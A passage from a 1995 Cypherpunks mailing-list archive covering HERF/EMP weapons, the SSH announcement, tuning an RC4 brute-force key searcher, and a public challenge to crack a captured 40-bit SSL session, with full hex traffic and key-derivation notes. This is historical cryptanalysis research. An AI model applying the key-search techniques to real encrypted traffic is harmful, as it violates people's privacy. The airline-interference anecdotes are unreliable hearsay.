<199507121603.MAA04959@access5.digex.net> .pm tolled: > Doug Hughes writes: > > Go see Winn Schwartau talk about HERF guns sometime. He passed around > > a picture of a device for < US$500 that could crash any computer within > > 50 yards. > > If it costs that little, I'd like to see one demonstrated. I've heard > of no demonstrations of such things. > > .pm > Hey, if someone will point me at some (free) plans, I'll build one and hold a demonstration. (I've got an old XT, a 286, a 3B1, and some monitors I'd like to blow up, and I've not yet blown up a pc using HERF yet (thermite--yes, HE--done it, lN2--yep, but not HREF.) --doug ayen at access.digex.net From erc at khijol.intele.net Wed Jul 12 09:35:03 1995 From: erc at khijol.intele.net (Ed Carp [khijol Sysadmin]) Date: Wed, 12 Jul 95 09:35:03 PDT Subject: Don't trust the net too much In-Reply-To: Message-ID: On Wed, 12 Jul 1995, Doug Hughes wrote: > Go see Winn Schwartau talk about HERF guns sometime. He passed around > a picture of a device for < US$500 that could crash any computer within > 50 yards.. Then again, it isn't too good for the person firing the gun > either.. (mega EM emissions). That all depends on the power level, and the emission pattern of the device, and the frequency. I've been working within 10 feet of a dipole being fed by a 1kW amplifier before, and it didn't make me sterile (but it might've loosened a filling or two ). > The parts are available if you know what to get. a VERY enlightening > and frightening presentation. I don't think he personally has built one. > His presentation contained a presentation on TEMPEST emissions, and > low level EM field effects on sensitive equipment problems too (a PBS > documentary - a VERY compelling presentation of why you should never > use walkman/CD players/radios/electronics equipment on airplanes if > they say not to, and you value your life) This sounds like absolute propoganda. If you do the calculations, you'll see that a 1 watt transmitter sitting 100 feet away from your target will generate an EMF less than that 1000kW ERP TV transmitter array you just flew over. If aircraft avionics were *that* sensitive, we'd have planes falling out of the sky, and we don't. Add to that the HF and VHF transmitting equipment in the cockpit, plus the microwave ovens in the fore and aft, PLUS the phones they have on the plane, and it adds up to a sizeable amount of RF bouncing around the cabin without you and your 2m talkie with it's 6 dB loss rubber duckie. Now, if every passenger fired up their 2m talkies, that might pose a problem, but then again every passenger wouldn't be using one, would they? Again, sounds like "we want to totally control your environment for your safety (actually, to minimize our liability)" crap. -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From terrell at sam.neosoft.com Wed Jul 12 09:49:27 1995 From: terrell at sam.neosoft.com (Buford Terrell) Date: Wed, 12 Jul 95 09:49:27 PDT Subject: Num Rat Message-ID: <199507121652.LAA15243@sam.neosoft.com> > > >I just looked @ the front of a M.O. computer catalog & the numerals in the >prices are anything but random. A very heavy concentration of eights (8) & >nines (9), apparently this company is more into $508.98 (color inkjet printer) >& $38.98 (well known game s/w) than the old late night TV standby of >"JUST $19.99!". Of course, this is because of excessively documented >ad nauseum human psychological tendencies that salescritters, who set at >least the lsd's of price, have been aware of for millenia. I'd bet, that >5(five), 8(eight), & 9(nine) are significantly more represented across >the board in prices (& thus in amounts for checks & tax write offs) than >than their random distribution by Benford's Law or more well known tests >for randomness would suggest. Has Mr. Negrini factored this into his program? >I guess the lesson is do a few pgp make__random's & convert a few of the >hex numbers to dec digits for the lsd's the next time one does creative expense >reporting. > >tjh > Just an aside -- J C Penney invented the $n.95 pricing scheme so that his clerks would have to make change. That way they had to use their registers, recording the sale and the cash didn't just go into their pockets. Even at that early date, proper security of automated systems depended largely on human factors. Buford C. Terrell 1303 San Jacinto Street Professor of Law Houston, TX 77002 South Texas College of Law voice (713)646-1857 terrell at sam.neosoft.com fax (713)646-1766 From sdw at lig.net Wed Jul 12 09:52:17 1995 From: sdw at lig.net (Stephen D. Williams) Date: Wed, 12 Jul 95 09:52:17 PDT Subject: ANNOUNCEMENT: Ssh (Secure Shell) remote login program In-Reply-To: <199507121451.RAA06122@shadows.cs.hut.fi> Message-ID: FANTASTIC!!!! I think we've all been waiting for / building this. Kudos... > Looking for a secure rlogin? > Want to deter IP-spoofing, DNS-spoofing, and routing-spoofing? > Want to run X11 connections and TCP/IP ports securely over an insecure network? > Worried about your privacy? > Then read this. > > > Introducing SSH (Secure Shell) Version 1.0 ... Quibbles/suggestions: ssh, while an obvious name, already collides with a nice shar decoder and a different kind of secure shell from CFS. Probably a worthwhile collision though. Second: It would be very helpful if the socket connection could be made (optionally) through a telnet proxy for firewalls (with optional quoting of problem characters). I've actually done this with TERM and a helper program. I may produce a patch for this. Third: Of course support for S/Key and tokens/hand held authenticators would be useful additions for some situations (although inferior to RSA...). Forth: Someone needs to crank out a Windows/Mac client... (Lower priority, but still useful.) Fifth: udprelay etc. could also be borrowed from the term suite. Sixth: Integration with TCP/NFS and/or client-server CFS would be fantastic. (One local CFS server acting as a secure client over tcp to a remote CFS server.) Remote encrypted mount of an encrypted partition... sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From Doug.Hughes at Eng.Auburn.EDU Wed Jul 12 09:58:49 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Wed, 12 Jul 95 09:58:49 PDT Subject: Don't trust the net too much In-Reply-To: Message-ID: >On Wed, 12 Jul 1995, Doug Hughes wrote: > >> Go see Winn Schwartau talk about HERF guns sometime. He passed around >> a picture of a device for < US$500 that could crash any computer within >> 50 yards.. Then again, it isn't too good for the person firing the gun >> either.. (mega EM emissions). > >That all depends on the power level, and the emission pattern of the >device, and the frequency. I've been working within 10 feet of a dipole >being fed by a 1kW amplifier before, and it didn't make me sterile (but >it might've loosened a filling or two ). > Agree! >> The parts are available if you know what to get. a VERY enlightening >> and frightening presentation. I don't think he personally has built one. >> His presentation contained a presentation on TEMPEST emissions, and >> low level EM field effects on sensitive equipment problems too (a PBS >> documentary - a VERY compelling presentation of why you should never >> use walkman/CD players/radios/electronics equipment on airplanes if >> they say not to, and you value your life) > >This sounds like absolute propoganda. If you do the calculations, you'll >see that a 1 watt transmitter sitting 100 feet away from your target will >generate an EMF less than that 1000kW ERP TV transmitter array you just >flew over. If aircraft avionics were *that* sensitive, we'd have planes >falling out of the sky, and we don't. Add to that the HF and VHF >transmitting equipment in the cockpit, plus the microwave ovens in the >fore and aft, PLUS the phones they have on the plane, and it adds up to a >sizeable amount of RF bouncing around the cabin without you and your 2m >talkie with it's 6 dB loss rubber duckie. > >Now, if every passenger fired up their 2m talkies, that might pose a >problem, but then again every passenger wouldn't be using one, would they? > >Again, sounds like "we want to totally control your environment for your >safety (actually, to minimize our liability)" crap. If you saw that PBS documentary (they want $20,000 for rebroadcast by the way). It was an 87 or 88 or something like that. It would make you a believer. There was a lady in a van that whenever she used her cellular phone, her sun's breathing apparatus (lung impaired) went into alarm. There was another case at a hospital pre-natal care word near the main entrance to the hospital. Several occasions when a local bus loop went by, and the guy happened to be talking on the intercom of the bus, several of the units in the ward went into alarm and failed (they had a tough time tracking that one down by the way). Wheel chairs for handicapped people were sensitive. They held a cellular phone about a foot from a wheel chair control and it started spinning around and generally going out of control. (The guy's wheel chair had gone out of control and run him off a heavy slope once and he almost died. it was unproven whether it was electromagnetic or just a defect). This just goes to show that we live in a world of electromagnetic soup. We really don't know how it effects the body long term, or whether, having more mission or life critical electronics could be interacting with over devices. This was the theme of the program. Another example was on an airplane (several of them.. older ones mostly I believe) pilots would occassionally lose instruments (VLS, etc) when passengers would activate portable transistor radios and such. Particularly radios.. But there was another case involving a portable computer.. These cases have been documented. It's a good thing the plain wasn't on a landing approach during a storm, or things could've gone very bad very quickly. I heard about the portable computer via a different source. The guy kept turning his computer on. The instruments would do a little dance. The captain would tell the stewardess, she would tell the passenger, he would turn it off for a while. Then, he would turn it on and repeat.. Until finally he refused to turn it off, so they confiscated it and returned it at the end of the trip. Urban Legend? maybe.. Believe what you want, but investigate the reports before dissmissing it out of hand as propaganda. I'd rather stay alive than rely on "theoretically it shouldn't matter." :) Keep in mind that newer planes (767, 757) let you do anything you want while the plane is in flight (but now while landing or takeoff), so they probably build better instrumentation and cabin shielding into the planes these days. If they say keep it off, chances are they have a good reason.. If you find categorical evidence to the contrary, I'm sure I would be very relieved to see it posted here. (rather than wondering if somebody in one of the 30 rows ahead of me might decide he knows better) Disclaimer: I have absolutely no idea what kind of shielding goes into an airplane nor any knowledge of building practices in the airline industry, but that should be obvious. ;) Well, I've posted enough on this, and I don't have any evidence besides what I've seen and what I've heard from others. For all I know the entire documentary was botched (it was shown on an evening newsmagazine in the late 80's hosted by Connie Chung - British documentary). Now back to your regularly scheduled mailing list already in progress. -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu "Real programmers use cat > file.as" From jshekter at alias.com Wed Jul 12 10:00:16 1995 From: jshekter at alias.com (Jonathan Shekter) Date: Wed, 12 Jul 95 10:00:16 PDT Subject: general RC4 key searcher: optimisations anyone? Message-ID: <9507121259.ZM1196@lennon.alias.com> >/* RC4 Brute Force Key Searcher, by Andy Brown 1995 > >This part of the package is meant to be portable between most systems >so that Unix users can take part in the searching. After all, the >kind of really high powered systems that can make a large dent in the >key space are not running Windows NT. You will, however, require Umm... ever hear of an Alpha? Besides which, this will compile on NT, and just about every other OS known to man, so it's a moot point. >#define SwapByte(a,b) ((a)^=(b),(b)^=(a),(a)^=(b)) If the two values are in memory (which they are as you swap state vector elements) then this xor trick requires three read-modify-write cyles -- slow on any architecture. Use a temp variable instead. >/* prepare the key */ > >for(counter=0;counter<256;counter++) >state[counter]=(unsigned char)counter; This is bad. Use either a) memcpy as in bruterc4 or b) an unsigned long, starting at either 0x00010203 or 0x03020100 depending on endianness, adding 0x04040404 at each iteration to generate four bytes per shot. Remember, on most machines a 32-bit store is the same speed as an 8-bit store. The fastes I have been able to do on this section was obtained by unrolling the loop manually, and using *two* long variables, alternating, to remove instruction dependancies. >for(counter=0;counter<256;counter++) > >index2=(key[index1]+state[counter]+index2) & 0xFF; >SwapByte(state[counter],state[index2]); > >if(++index1==keybytes) >index1=0; 1) This loop needs to be unrolled! Using direct array offsets instead of incrementing the counter is a speedup on many machines. Also, experiment with the unroll size. Making it larger increases performance until you get too big to fit in the cache, at which point it slows down. My experiments on a few different types of machines showed that unrolling the inner loop 16 or 32 times was usually about right. See the inner loop of bruterc4. Use macros to do the unrolling. 2) You can avoid the if statement for checking for key wrap around as follows: in your initialization, construct an array as follows: for (i=0; i/* do two RC4 operations as a preliminary test. If this fails then test >the next one, then the rest. This should result in a lot of rejections >before the rest of the loop is entered */ I like the early-out test. >x=(x+1) & 0xFF; >y=(state[x]+y) & 0xFF; >SwapByte(state[x],state[y]); Again, swapping with xor probably hurts you here. Use a register temp variable. My personal keycracker accepts general length keys and is not too much slower than bruterc4. So it can be done. - Jonathan -- ____________________________________________________ / Jonathan Shekter / / / Graphics Hack / "Probability alone / / Alias/Wavefront / dictates that I exist" / /______________________/____________________________/ From Andrew.Spring at ping.be Wed Jul 12 10:04:21 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Wed, 12 Jul 95 10:04:21 PDT Subject: Why they can be sued... (Was: freedom of speech) Message-ID: > >Last thursday there was a report in the news. They started a new >lawsuit against a Nazi, who was already earlier sentenced for other >Nazi crimes. He was sued because he distributed a video. In the video Just to sidetrack the issue, a bit. Are there any ex-Nazis who participated in the Holocaust who would dispute this guy? > >I wanted to know in detail why he can be sued. Therefore I had a look >into my book commenting the criminal law. I try to translate as good >as I can. > >In the german criminal law there is a chapter about slander, libel and >such things. > >Slander is seen in Germany not as a crime, but as an offence. It >differs from other offences in the detail, that the prosecuting attorney >can't sue it himself. It needs the request of a 'victim'. > >If the victim dies, the right to request is transferred to the >wife/husband and the children. If there aren't any, to the parents. If >there aren't any, to the brothes/sisters and grandchildren. > > Par. 189: Wer das Andenken eines Verstorbenen verunglimpft, > wird mit Freiheitsstrafe bis zu zwei Jahren oder mit > Geldstrafe bestraft. > > Who decries the memory to a dead person, is punished with jail up > to two years or fine. > This is a little different from the US. I've never heard of anybody being jailed or fined for libel/slander, just sued for it. > >This applies under certain circumstances to saying that the holocaust >never happened. > >Do you have a law like this in America? > > No. You can't libel the dead. Most historians would get their socks sued off if you could. I remember reading about a case once in which two sons wanted to sue the man who had libelled their dead father. They couldnt do it through normal channels, father being dead and all, so they publicly called the libeller a liar, repeatedly, eventually provoking _him_ to sue _them_ thereby allowing the truth of the original liber to be tested in court. The sons won; a moral victory at least. > >This is the reason why someone can be sued if he claims that the >holocaust never happened. It is not the idea itself. The reason is >that it can be a form of violence against dead people in the eyes of >german law. > So in other words, the Holocaust-Denial crime is a creative extension of existing libel laws. >BTW: I have a collection of the most important german laws on my >webserver. You can find the list at > >http://iaks-www.ira.uka.de/ta/Diverses/Gesetze/ > Useful to know that. Aachen is just down the road from here. -- Thank you VERY much! You'll be getting a Handsome Simulfax Copy of your OWN words in the mail soon (and My Reply). PGP Print: 0529 C9AF 613E 9E49 378E 54CD E232 DF96 Thank you for question, exit left to Funway. From Phiberflea at aol.com Wed Jul 12 10:17:40 1995 From: Phiberflea at aol.com (Phiberflea at aol.com) Date: Wed, 12 Jul 95 10:17:40 PDT Subject: Free Directory Pinpoints E-Mail Addresses Message-ID: <950712131505_31185620@aol.com> Hi Team, Received this little blurb in my e-mail. >Free Directory Pinpoints E-Mail Addresses >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > Palo Alto, Calif. -- .... Well, SLED Corp. has stepped up to answer the call of all the Internet >users who have ever screamed "How can I find someone's e-mail address?" >..... > The Palo Alto-based company recently released its Four11 Online User >Directory as a free service for Internet users. The directory is easily >searched by e-mail, through the use of e-mail forms, or the Web, by using >browsers such as Mosaic or Lynx. Search parameters include name, location, >old e-mail address, Group Connection and wildcards. >...Membership also includes PGP encryption certification and storage >services. Members who provide proper identification can have their PGP >public key signed with the SLED Silver Signature. Signed keys are added >to the key owner's directory listing and can be quickly retrieved by other >Internet users through either e-mail or the Web. These keys, actually >small data files, are used to send private messages and verify digital >signatures. The combination of an Internet wide directory with a PGP key >server makes it possible to quickly find someone, obtain their key, and >send them a secure message. Things that make you go hmmmm.... Ginger Shei shuo zhong-guo hua? From tcmay at sensemedia.net Wed Jul 12 10:19:00 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Wed, 12 Jul 95 10:19:00 PDT Subject: My only words on "Electromagnetic Pulse" Damage Message-ID: Much discussion this morning about EMP, electromagnetic pulse weapons, HERF guns, Winn Schwartau's "Information Warfare" scenarios, TEMPEST, etc. Not closely related to Cypherpunks themes, but lots of speculation is continuing. I happen to know a fair amount about chip vulnerability to various kinds of radiation and electrostatic discharge, and have had contacts with folks who know Schwartau. (I was also interviewed for a Schwartau-oriented BBC television program called "The I-Bomb.") Here's what I know: * EMP can of course zap devices. High electric field gradients can induce voltage drops that blow inputs, burn out circuits, etc. Lots of mechanisms for this, of course. Latch-up in CMOS circuits, field oxide overvoltage breakdown, etc. There is an entire sub-industry devoted to electrostatic discharge (ESD), with conferences, products, consulting services, etc. * However, getting the voltages coupled into circuits is another matter. Modern chips can usually handle static charge buildups that are in the tens of thousands of volts range (input protection devices are on the input pads). Static discharge should be avoided (wrist straps, etc.), but most modern devices will survive the static discharges that folks can generate. * The point? A _distant_ (tens of meters away) source of electromagnetic fields will have a pretty hard time of creating field gradients able to equal these 10,000 volt local fields caused routinely by static buildup. (Electric fields are of course measured in terms of "volts per meter"...do the math.) * The traditional EMP work is well-covered in each year's "Nuclear and Space Radiation Effects Conference," the Proceedings of which are included in the December issue each year of "IEEE Transactions on Nuclear Science and Space Radiation Effects." I advise anyone interested in this topic to consult these sources. (I've been to a few of these conferences, beginning in 1978.) * Most of the traditional EMP work is oriented toward the detonation of nukes in orbit, where the interaction of the photons from the bomb with electrons in the upper atmosphere create an electromagnetic field of millions of volts per meter, the so-called "electromagnetic pulse" that blows circuits. (This effect was apparently first noticed, by U.S. scientists at least, after a 1962 high altitude burst over Johnson Atoll in the Pacific, with electric circuits as far away as Hawaii being blown.) * Schwartau has not, to my knowledge, ever seen a direct demonstration of the effects he is describing in his book. In fact, much of his "HERF gun" stuff is admittedly speculative. * He has gotten interest from British intelligence (MI-5 or MI-6, not sure which) in his "scenarios" for knocking out financial centers with EMP bombs and HERF guns. A friend of mine, who can speak up if he wishes here, has had some contacts with Schwartau and may have started to do some preliminary experiments on this stuff. (The EMP/HERF folks in governments have of course a lot of experience here. I'm just saying that the "Schwartau crowd" appears to just be getting started on actual experiments, so any speculations in "Information Warfare" should be taken as just that, as speculations.) * As a matter of commenting on one thread about damage to the "HERF gun" itself, the conventional notion is that such a device would be a "set and forget" device, with a suitcase planted near a corporate office complex and set to "detonate" some time later. All the talk about reuse and damage to the operator is beside the point. (As is the speculation about effects on the human body....bodies can withstand incredibly high fields, so long as a ground path for current does not form (electrocution)....I could go on about this, but won't.) * In my opinion, Schwartau's chief interest is in spreading fear and concern about the "vulnerability" of the world's "information infrastructure." This cranks up interest in his book, in getting talk show interviews, etc. He may have "patriotic" motives as well, but I think a large part of what we're seeing is the usual, and increasingly common, journalistic hype. This is not to say there is no basis for concern, just that this is not the first and foremost concern. After, cutting power lines has long been an easy way to knock out economic activity--it may have recently happened in Penang, Malaysis, for example, where many chip assembly plans were knocked off-line for a few weeks by a power cable cut. This is all I'll say on the current debate on TEMPEST, HERF, EMP, etc. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From hfinney at shell.portal.com Wed Jul 12 10:23:37 1995 From: hfinney at shell.portal.com (Hal) Date: Wed, 12 Jul 95 10:23:37 PDT Subject: SSL RC4 challenge Message-ID: <199507121722.KAA19834@jobe.shell.portal.com> Here is a challenge to try breaking SSL using the default exportable encryption mode, 40-bit RC4. It consists of a record of a submission of form data which was sent to Netscape's electronic shop order form in "secure" mode. However the data I entered in the form is not my real name and address. The challenge is to break the encryption and recover the name and address info I entered in the form and sent securely to Netscape. (A URL for info on SSL is http://home.netscape.com/newsref/std/SSL.html.) Below is the data which was sent back and forth, along with some annotations to help interpret it. The connection was made to order.netscape.com at port 443, the https port. The following is the first message from client to server, the CLIENT-HELLO message. It is not encrypted. 0x80 0x1c 0x01 0x00 0x02 0x00 0x03 0x00 0x00 0x00 0x10 0x02 0x00 0x80 0xaf 0x84 0xa7 0x79 0xf8 0x13 0x69 0x20 0x25 0x9b 0x53 0xa0 0x60 0xae 0x75 0x51 This is interpreted as follows: 0x80 0x1c Length field: 28 bytes follow in the packet. 0x01 MSG_CLIENT_HELLO 0x00 0x02 CLIENT-VERSION-MSB CLIENT-VERSION-LSB 0x00 0x03 CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB 0x00 0x00 SESSION-ID-LENGTH-MSB SESSION-ID-LENGTH-LSB 0x00 0x10 CHALLENGE-LENGTH-MSB CHALLENGE-LENGTH-LSB 0x02 0x00 0x80 CIPHER-SPECS-DATA SESSION-ID-DATA 0xaf...0x51 CHALLENGE-DATA [16 bytes] The only cipher spec sent (and hence supported) by the browser is 0x02 0x00 0x80, which is SSL_CK_RC4_128_EXPORT40_WITH_MD5. No session id is sent, hence new key information will be calculated for this session. And 16 bytes of challenge data are sent in the clear; this will be useful as known plaintext returned encrypted by the server later. The following data is then returned by the server, in the SERVER-HELLO message: 0x82 0x2b 0x04 0x00 0x01 0x00 0x02 0x02 0x0d 0x00 0x03 0x00 0x10 0x30 0x82 0x02 0x09 0x30 0x82 0x01 0x72 0x02 0x02 0x00 0x88 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x30 0x47 0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x06 0x13 0x02 0x55 0x53 0x31 0x10 0x30 0x0e 0x06 0x03 0x55 0x04 0x0b 0x13 0x07 0x54 0x65 0x73 0x74 0x20 0x43 0x41 0x31 0x26 0x30 0x24 0x06 0x03 0x55 0x04 0x0a 0x13 0x1d 0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d 0x6d 0x75 0x6e 0x69 0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70 0x2e 0x30 0x1e 0x17 0x0d 0x39 0x35 0x30 0x32 0x32 0x34 0x30 0x31 0x30 0x39 0x32 0x34 0x5a 0x17 0x0d 0x39 0x37 0x30 0x32 0x32 0x33 0x30 0x31 0x30 0x39 0x32 0x34 0x5a 0x30 0x81 0x97 0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x06 0x13 0x02 0x55 0x53 0x31 0x13 0x30 0x11 0x06 0x03 0x55 0x04 0x08 0x13 0x0a 0x43 0x61 0x6c 0x69 0x66 0x6f 0x72 0x6e 0x69 0x61 0x31 0x16 0x30 0x14 0x06 0x03 0x55 0x04 0x07 0x13 0x0d 0x4d 0x6f 0x75 0x6e 0x74 0x61 0x69 0x6e 0x20 0x56 0x69 0x65 0x77 0x31 0x2c 0x30 0x2a 0x06 0x03 0x55 0x04 0x0a 0x13 0x23 0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d 0x6d 0x75 0x6e 0x69 0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70 0x6f 0x72 0x61 0x74 0x69 0x6f 0x6e 0x31 0x16 0x30 0x14 0x06 0x03 0x55 0x04 0x0b 0x13 0x0d 0x4f 0x6e 0x6c 0x69 0x6e 0x65 0x20 0x4f 0x72 0x64 0x65 0x72 0x73 0x31 0x15 0x30 0x13 0x06 0x03 0x55 0x04 0x03 0x13 0x0c 0x41 0x72 0x69 0x20 0x4c 0x75 0x6f 0x74 0x6f 0x6e 0x65 0x6e 0x30 0x5a 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01 0x01 0x05 0x00 0x03 0x49 0x00 0x30 0x46 0x02 0x41 0x00 0xa5 0xa7 0x7b 0x42 0xb1 0x79 0x2d 0x0b 0x35 0x08 0xb4 0x0d 0x74 0x1d 0x46 0x6a 0x29 0x07 0x47 0x08 0xdc 0x3a 0x76 0x36 0xbd 0x7f 0xb3 0xd4 0xa9 0x85 0x9d 0x4b 0x65 0x74 0xc1 0x00 0x56 0xec 0x5a 0x31 0x72 0x23 0x04 0xc1 0xcf 0x78 0x63 0x21 0x77 0x69 0xd9 0xf0 0x61 0xc8 0x73 0xf7 0xdc 0x4c 0xde 0xd2 0x22 0x99 0x79 0xdf 0x02 0x01 0x03 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x03 0x81 0x81 0x00 0x7e 0x4a 0x28 0x7d 0xba 0xfa 0x41 0x5a 0x19 0x1c 0x9a 0xea 0x6d 0x3b 0x07 0x1c 0x97 0xe0 0xf5 0xf8 0x4c 0xd5 0x92 0x0c 0x1c 0x30 0x49 0x06 0x72 0x42 0x9a 0x3f 0xfc 0x3b 0x11 0x17 0x78 0x7e 0x6c 0x27 0x8a 0x12 0x19 0xf3 0x08 0x18 0x6e 0xe0 0xc3 0xbe 0xe7 0x37 0xbd 0x4e 0xae 0xe1 0x9e 0x4a 0x3b 0xa9 0xbf 0xc0 0x92 0x59 0x2c 0xdb 0x37 0x34 0xc8 0xa0 0xc0 0xba 0xb8 0x6f 0xd3 0xd6 0xc7 0x48 0x88 0xbc 0xd6 0xff 0x7a 0xf7 0x76 0x70 0x2c 0x19 0x07 0xc8 0x7c 0x80 0x29 0x18 0x58 0xfc 0xd1 0x12 0x86 0x99 0x4e 0x32 0xee 0xb9 0xf5 0x11 0x70 0xd5 0x1b 0xf7 0x85 0x5b 0x4a 0x0e 0xd6 0xe6 0x6c 0x52 0xf5 0x8a 0x2c 0x97 0x3e 0x63 0x85 0x57 0x43 0xbc 0x02 0x00 0x80 0xbf 0xeb 0x90 0xf8 0x2c 0x0c 0xe1 0xea 0x18 0xac 0x11 0x4c 0x83 0x14 0x21 0xb6 This is interpreted as follows: 0x82 0x2b Packet length, 555 bytes follow. 0x04 MSG-SERVER-HELLO 0x00 SESSION-ID-HIT 0x01 CERTIFICATE-TYPE 0x00 0x02 SERVER-VERSION-MSB SERVER-VERSION-LSB 0x02 0x0d CERTIFICATE-LENGTH-MSB CERTIFICATE-LENGTH-LSB 0x00 0x03 CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB 0x00 0x10 CONNECTION-ID-LENGTH-MSB CONNECTION-ID-LENGTH-LSB 0x30...0xbc CERTIFICATE-DATA [525 bytes] 0x02 0x00 0x80 CIPHER-SPECS-DATA 0xbf...0xb6 CONNECTION-ID-DATA [16 bytes] Most of the packet is the certificate. SESSION-ID-HIT is 0 since no session ID was sent by the client. After the 525 (0x020d) bytes of certificate comes the 3 byte code for 40 bit RC4, then the 16 byte connection ID. The main importance of the connection ID data here is that it helps to calculate the session keys as described below. The next message, from the client to the server, is the CLIENT-MASTER-KEY sent mostly in the clear: 0x80 0x55 0x02 0x02 0x00 0x80 0x00 0x0b 0x00 0x40 0x00 0x00 0x0e 0x89 0x94 0xb8 0xbf 0x0e 0xb9 0x2e 0x50 0x44 0x07 0x8c 0x52 0xeb 0xef 0x44 0xc1 0x01 0x4b 0xc1 0x02 0xd2 0x2e 0x37 0x1f 0x1d 0x54 0xc2 0x83 0x45 0x79 0x6b 0xc8 0xe3 0x85 0x17 0xb8 0xd4 0x84 0xc6 0x9f 0xb1 0x6a 0x03 0x2e 0x97 0xae 0x82 0x75 0x10 0xf0 0x7b 0x5f 0x25 0x7b 0x88 0x75 0xc6 0x7a 0x33 0x5f 0xd6 0x96 0x99 0x94 0xd0 0x7a 0x78 0xae 0x50 0x32 0x1a 0xbb 0x66 0x50 It is interpreted as follows: 0x80 0x55 Packet length, 85 bytes follow. 0x02 MSG-CLIENT-MASTER-KEY 0x02 0x00 0x80 CIPHER-KIND 0x00 0x0b CLEAR-KEY-LENGTH-MSB CLEAR-KEY-LENGTH-LSB 0x00 0x40 ENCRYPTED-KEY-LENGTH-MSB ENCRYPTED-KEY-LENGTH-LSB 0x00 0x00 KEY-ARG-LENGTH-MSB KEY-ARG-LENGTH-LSB 0x0e...0x07 CLEAR-KEY-DATA [11 bytes] 0x8c...0x50 ENCRYPTED-KEY-DATA [64 bytes] KEY-ARG-DATA The 11 most significant bytes (88 bits) of "master key" information are sent in the clear as the CLEAR-KEY-DATA. The remaining 40 low-order bits of the 128-bit master key are RSA encrypted using the server's public key, expanding in the process to 64 bytes, and sent as the ENCRYPTED-KEY-DATA. No KEY-ARG-DATA is sent since RC4 doesn't need an initialization vector. Now that these packets have been exchanged, from this point on, all packets are sent encrypted. For each such packet, after the packet length bytes there is a 16-byte Message Authentication Code (MAC). Then comes the RC4 encrypted data itself. Two different session keys are used, both generated from the master key, the 16-byte challenge data, and the 16-byte connection ID data. The CLIENT-READ-KEY, used for data sent from server to client, is calculated as: MD5 (MASTER-KEY, "0", CHALLENGE, CONNECTION-ID). "0" is one byte of 0x30, ascii 0. The CLIENT-WRITE-KEY, used for data sent from client to server, is calculated as: MD5 (MASTER-KEY, "1", CHALLENGE, CONNECTION-ID). "1" is one byte of 0x31, ascii 1. MD5 produces 128 bits of output which are used directly as the key input to the RC4 algorithm. The next message, from server to client, is SERVER-VERIFY. It is sent encrypted: 0x80 0x21 0x37 0x68 0x3a 0x8c 0x7d 0x33 0xb2 0x2f 0xb9 0x66 0xeb 0xd2 0x63 0xcd 0xa7 0xed 0x71 0xa0 0xb6 0x2f 0xb6 0xe2 0x31 0xa4 0x2a 0x81 0xd3 0x25 0x61 0x58 0xbc 0xf0 0xf4 This is interpreted as follows: 0x80 0x21 Packet length, 33 bytes follow 0x37...0xed MAC [16 bytes] 0x71 RC4 encrypted MSG-SERVER-VERIFY (0x05) 0xa0...0xf4 RC4 encrypted CHALLENGE-DATA from CLIENT-HELLO message [16 bytes] The first RC4 encrypted byte is MSG-SERVER-VERIFY (which has a value of 0x05). This is followed by 16 bytes of challenge data from the first client message, encrypted. These 17 bytes represent known plaintext which can be used to easily check any guessed RC4 CLIENT-READ-KEY. Let me make this a little more clear. The first RC4 encryption with the CLIENT-READ-KEY, immediately after key setup, is as follows: Plaintext (MSG-SERVER-VERIFY plus CHALLENGE-DATA): 0x05 0xaf 0x84 0xa7 0x79 0xf8 0x13 0x69 0x20 0x25 0x9b 0x53 0xa0 0x60 0xae 0x75 0x51 Ciphertext (from SERVER-VERIFY packet): 0x71 0xa0 0xb6 0x2f 0xb6 0xe2 0x31 0xa4 0x2a 0x81 0xd3 0x25 0x61 0x58 0xbc 0xf0 0xf4 The next message in the protocol is CLIENT-FINISHED, sent encrypted from client to server: 0x80 0x21 0xed 0x59 0x0a 0x2a 0x80 0x50 0x42 0xec 0xcd 0xed 0x6c 0x96 0x0a 0xab 0x5c 0x0e 0xed 0x55 0xc3 0x21 0x6e 0x34 0x26 0x5b 0x46 0x41 0x35 0x51 0xb7 0xaa 0xec 0x57 0x9f This is interpreted as follows: 0x80 0x21 Packet length, 33 bytes follow 0xed...0x0e MAC [16 bytes] 0xed RC4 encrypted MSG-CLIENT-FINISHED (0x03) 